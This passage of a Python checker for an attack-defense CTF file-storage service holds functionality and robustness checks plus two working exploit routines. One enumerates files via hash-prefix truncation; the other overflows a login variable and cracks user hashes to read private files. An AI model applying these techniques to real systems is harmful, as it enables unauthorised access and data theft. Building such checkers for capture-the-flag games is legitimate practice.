    920    # check that persisted file info is still valid
    921    check_stlinfo(
    922        session.logger,
    923        info,
    924        ref,
    925        ref_modelname=modelname,
    926        ref_modelid=modelid,
    927        ref_solidname=solidname,
    928    )
    929
    930
    931@checker.getnoise(1)
    932async def getnoise_registered(
    933    task: GetnoiseCheckerTaskMessage, di: DependencyInjector
    934) -> None:
    935    db = await di.get(ChainDB)
    936    modelid, modelname, solidname, stlfile, authstr = await getdb(db, "info")
    937    ref = parse_stlinfo(stlfile)
    938
    939    session = await di.get(Session)
    940    # check that auth works and tells us we are logging in again
    941    await do_auth(session, authstr, check=True, newuser=False)
    942    # check that search works on persisted file
    943    expected = [modelname, solidname, stlfile, modelid]
    944    info, stl = await check_in_search(session, modelname, expected, download=True)
    945    # check that search for cached value works
    946    info, stl = await check_in_search(session, b"last", expected, download=True)
    947    # check that persisted file info is still valid
    948    check_stlinfo(
    949        session.logger,
    950        info,
    951        ref,
    952        ref_modelname=modelname,
    953        ref_modelid=modelid,
    954        ref_solidname=solidname,
    955    )
    956    # check that list works on persisted file
    957    await check_listed(session, [modelname, modelid + b"-", solidname])
    958
    959
@checker.havoc(0)
async def havoc_good_upload_ascii(di: DependencyInjector) -> None:
    """Havoc: a well-formed ASCII STL upload must succeed and round-trip."""
    await test_good_upload(di, "ascii")


@checker.havoc(1)
async def havoc_bad_upload_ascii_v1(di: DependencyInjector) -> None:
    """Havoc: malformed ASCII STL (corruption variant 1) must be rejected."""
    await test_bad_upload(di, "ascii", 1)


@checker.havoc(2)
async def havoc_bad_upload_ascii_v2(di: DependencyInjector) -> None:
    """Havoc: malformed ASCII STL (corruption variant 2) must be rejected."""
    await test_bad_upload(di, "ascii", 2)


@checker.havoc(3)
async def havoc_bad_upload_ascii_v3(di: DependencyInjector) -> None:
    """Havoc: malformed ASCII STL (corruption variant 3) must be rejected."""
    await test_bad_upload(di, "ascii", 3)


@checker.havoc(4)
async def havoc_good_upload_bin(di: DependencyInjector) -> None:
    """Havoc: a well-formed binary STL upload must succeed and round-trip."""
    await test_good_upload(di, "bin")


@checker.havoc(5)
async def havoc_bad_upload_bin_v1(di: DependencyInjector) -> None:
    """Havoc: malformed binary STL (corruption variant 1) must be rejected."""
    await test_bad_upload(di, "bin", 1)


@checker.havoc(6)
async def havoc_bad_upload_bin_v2(di: DependencyInjector) -> None:
    """Havoc: malformed binary STL (corruption variant 2) must be rejected."""
    await test_bad_upload(di, "bin", 2)


@checker.havoc(7)
async def havoc_bad_upload_bin_v3(di: DependencyInjector) -> None:
    """Havoc: malformed binary STL (corruption variant 3) must be rejected."""
    await test_bad_upload(di, "bin", 3)


@checker.havoc(8)
async def havoc_bad_upload_garbage(di: DependencyInjector) -> None:
    """Havoc: garbage (neither ASCII nor binary STL) must be rejected."""
    await test_bad_upload(di, "garbage", 1)


@checker.havoc(9)
async def havoc_hash_collision(di: DependencyInjector) -> None:
    """Havoc: random identifiers must not collide with existing search/auth hashes."""
    await test_hash_collision(di)
   1008
   1009
@checker.exploit(0)
async def exploit_prefix_truncation(
    task: ExploitCheckerTaskMessage, di: DependencyInjector
) -> bytes:
    """Exploit for flagstore 0: enumerate stored files via hash-prefix truncation.

    Embeds the target model-id prefix (taken from attack_info, which has the
    form "Model <id10>.. is kinda sus") into a crafted STL, uploads it, then
    uses the service's "search last" cache to obtain a list of matching file
    hashes and dumps each one looking for the flag.
    Raises MumbleException if the flag cannot be extracted.
    """
    modelname = fakeid()
    searcher = await di.get(FlagSearcher)

    # Generate exploit payload using attack_info
    assert task.attack_info is not None
    # attack_info word [1] is "<id10>.."; strip the trailing ".." dots.
    target_prefix = task.attack_info.split()[1][:-2].encode()
    evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix

    # Upload evil file
    session = await di.get(Session)
    await do_upload(session, modelname, stlfile=evil_file, check=True)
    await do_search(session, modelname, download=False, check=True)

    # Retrieve evil file for hash truncation
    session.write(b"search last\n")
    await session.drain()
    resp = await session.readline()
    if b"ERR:" in resp:
        raise MumbleException("Searching for cached entry fails!")
    resp += await session.readuntil(b"[q to quit]: ", ctx="reading search results")
    # One candidate file hash per non-empty line (last line is the prompt).
    filelist = [l.strip() for l in resp.split(b"\n")[:-1] if l.strip() != b""]
    if len(filelist) == 0:
        raise MumbleException("Failed to list files through search")

    # Use it to enumerate other files and grab contents
    flag = None
    for fhash in filelist:
        # Select the file by hash; answer "n" to the follow-up prompt.
        session.write(fhash + b"\n")
        session.write(b"n\n")
        await session.drain()
        resp = await session.readline()
        if b"ERR:" in resp:
            session.logger.critical(f"Failed on selection of file: {resp!r}")
            raise MumbleException("Failed to retrieve file contents via exploit")
        resp += await session.readuntil(
            b"==================", ctx="getting file info (1)"
        )
        resp += await session.readuntil(b"[q to quit]: ", ctx="getting file info (2)")
        if flag := searcher.search_flag(resp):
            break

    # Done! Leave the interactive search menu cleanly.
    session.write(b"q\n")
    await session.drain()
    await session.readuntil(prompt)

    if flag is not None:
        return flag

    raise MumbleException("Exploit for flagstore 1 failed")
   1064
   1065
@checker.exploit(1)
async def exploit_hash_overflow(
    task: ExploitCheckerTaskMessage, di: DependencyInjector
) -> bytes:
    # NOTE(review): annotation corrected from "-> None"; this function returns
    # the flag bytes in two places, matching exploit 0's "-> bytes" signature.
    """Exploit for flagstore 1: overflow the 'loggedin' flag, then crack user hashes.

    A search with an oversized 0xff-laden query overflows the service's
    loggedin variable; the resulting privileged 'list' leaks private user
    hashes. For each hash matching the attack_info prefix, a preimage is
    computed with reverse_hash() and used to log in and read that user's
    files. Raises MumbleException if no flag is found.
    """
    searcher = await di.get(FlagSearcher)
    logger = await di.get(LoggerAdapter)

    assert task.attack_info is not None
    # attack_info word [1] is "<userid10>.."; strip the trailing ".." dots.
    target_prefix = task.attack_info.split()[1][:-2].encode()

    # Overflow loggedin variable
    session = await di.get(Session)
    session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
    await session.drain()
    await session.readuntil(prompt, ctx="overflowing loggedin via search")
    session.write(b"auth\n")
    await session.drain()
    resp = await session.readuntil(prompt, ctx="checking auth success")
    if b"Already logged in!" not in resp:
        raise MumbleException("Exploit did not set 'loggedin' variable via overflow")

    # Get private user hashes via 'list'
    users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
    resp = await do_list(session, check=True)
    await session.exit()

    # Check if there is a flag in the response already
    # (shouldn't be, enochecker_test will throw an error if this succeeds)
    if flag := searcher.search_flag(resp):
        return flag

    logger.debug(f"Searching for user with prefix: {target_prefix!r}")
    logger.debug(f"Possible users: {users!r}")

    # Login as each private user
    for userhash in users:
        if not userhash.startswith(target_prefix):
            continue

        # Find preimage of user hash
        authstr = reverse_hash(userhash.decode())

        # Authenticate and check if the user is new
        session = await di.get(Session)
        logger.debug(f"Trying to login as user: {userhash!r}")
        if not await do_auth(session, authstr, check=False, newuser=False):
            await session.exit()
            # We dont raise an exception, because it could be that user dir was cleaned
            # up just before we logged in, not necessarily because of an invalid prehash.
            # If there was a problem with the preimage generation, we wont find a flag and
            # an exception will be raised later anways...
            continue

        # list all private files of user
        resp = await do_list(session, check=True)
        await session.exit()

        # Search for flag in solid names
        solidnames = b"\n".join(
            [l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]
        )
        if flag := searcher.search_flag(solidnames):
            return flag

    raise MumbleException("Exploit for flagstore 2 failed")
   1131
   1132
if __name__ == "__main__":
    # Run the enochecker3 service on the conventional checker port.
    checker.run(port=9091)